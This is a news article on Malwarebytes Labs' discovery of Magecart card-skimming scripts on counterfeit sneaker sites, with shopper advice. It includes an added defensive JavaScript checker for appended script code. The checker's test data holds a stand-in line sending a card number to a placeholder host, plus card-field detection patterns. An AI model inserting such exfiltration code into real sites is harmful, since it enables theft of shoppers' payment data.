Counterfeit Sneaker Sites Under Attack

Sneakerheads met an unwelcome surprise last month: a “large-scale hacking operation” targeting counterfeit sneaker sites.

Malwarebytes Labs, a company committed to protecting consumers from malware, recently discovered malicious scripts, of the kind used in what are called “Magecart attacks,” installed on hundreds of counterfeit sneaker sites.

These scripts capture credit card information from buyers and send it to a remote server operated by hackers.

“We recently identified a credit card skimmer injected into hundreds of fraudulent sites selling brand name shoes,” Malwarebytes Labs explains, “unfortunate shoppers may not only be disappointed with the faux merchandise, but they will also relinquish their personal and financial data to Magecart fraudsters.”

How do they do this?

First, hackers promote these infected counterfeit sites through posts and forums that direct unsuspecting users back to the site. It’s here that consumers find Nike shoes once offered at $2,000 now selling for $134.

“To avoid falling into one of their traps, there are a couple of simple steps you can take,” Forbes’ Lee Mathews explains, “for starters, remind yourself that if something seems too good to be true, it probably is. Online counterfeiters tend to promise jaw-dropping discounts on highly sought-after items that often command a premium.”

Compelled to buy, consumers enter their card info, unaware that malicious JavaScript has been added to the bottom of the platform’s script.

“After running the JavaScript through a JS beautifier, we can see that the script is collecting submitted credit card information entered by the shopper and then sending it to a site…,” Malwarebytes Labs says, “this stolen credit card information can then be collected later by the attackers.”
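For anyone reviewing a store's script rather than shopping on it, code added to the bottom of an existing file can be surfaced by comparing the served copy with a known-good one and inspecting only the extra tail. The sketch below is an added example, not code from Malwarebytes or the article; the baseline, the tampered copy, the hostnames, the keyword list and the `sendTo`/`readField` names are constructed placeholders.

```javascript
// Constructed known-good copy of a store script.
const BASELINE = [
  "function updateCart(qty) {",
  "  document.getElementById('qty').textContent = qty;",
  "}",
].join("\n");

// Constructed tampered copy: the same file with one inert stand-in line at the
// bottom. sendTo/readField are hypothetical names, not real browser APIs.
const SERVED = BASELINE + "\n\n" +
  "sendTo('https://collector.example/c', readField('cardnumber'));\n";

// Assumed heuristics: payment-field wording and absolute URLs.
const CARD_TERMS = /card.?(number|num|no)|cc.?(num|number)|cvv|cvc|expir/gi;
const URL_HOST = /https?:\/\/([a-z0-9.-]+)/gi;

// Ignore line-ending and trailing-whitespace noise so a re-save does not alarm.
function normalise(src) {
  return src.replace(/\r\n/g, "\n").replace(/[ \t]+$/gm, "").replace(/\n+$/, "");
}

function reviewScript(baseline, served, allowedHosts) {
  const base = normalise(baseline);
  const live = normalise(served);
  const empty = { appended: "", hosts: [], cardTerms: [] };
  if (live === base) return { status: "unchanged", ...empty };
  // Changes that are not a pure tail addition need a full diff instead.
  if (!live.startsWith(base)) return { status: "modified", ...empty };

  const appended = live.slice(base.length).trim();
  // Hosts named in the tail that the site is not expected to talk to.
  const hosts = [...new Set(
    [...appended.matchAll(URL_HOST)].map((m) => m[1].toLowerCase())
  )].filter((h) => !allowedHosts.includes(h));
  // Payment-field wording found in the tail.
  const cardTerms = [...new Set(
    [...appended.matchAll(CARD_TERMS)].map((m) => m[0].toLowerCase())
  )];
  const status = hosts.length && cardTerms.length ? "appended-suspicious" : "appended";
  return { status, appended, hosts, cardTerms };
}

console.log(reviewScript(BASELINE, SERVED, ["cdn.shop.example"]));
```

A tail that both names an unexpected host and mentions card fields is a prompt for manual review, not proof of a skimmer; obfuscated code will not match these keywords, so any unexplained tail deserves a look.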

To protect yourself from this kind of attack, Mathews suggests installing a browser extension to detect and block malicious scripts. Malwarebytes Labs offers one such extension.

Where to find more info.

To check the full list of compromised stores, visit Malwarebytes’ blog.
